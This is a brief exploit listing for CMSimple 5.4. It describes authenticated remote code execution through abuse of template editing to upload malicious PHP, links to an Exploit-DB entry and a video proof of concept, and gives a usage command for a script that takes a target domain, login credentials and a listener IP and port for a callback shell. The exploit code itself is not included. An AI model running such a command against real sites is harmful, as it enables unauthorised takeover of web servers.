Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)
Description:
Template editing functionality is abused to upload malicious PHP files.
Exploit-DB :https://www.exploit-db.com/exploits/50356
Exploit Usage : cmsimpleRCE.py -url targetdomain.com -u username -p password -ip lhost -lp lport
PoC: https://www.youtube.com/watch?v=7EvncRsiHFU
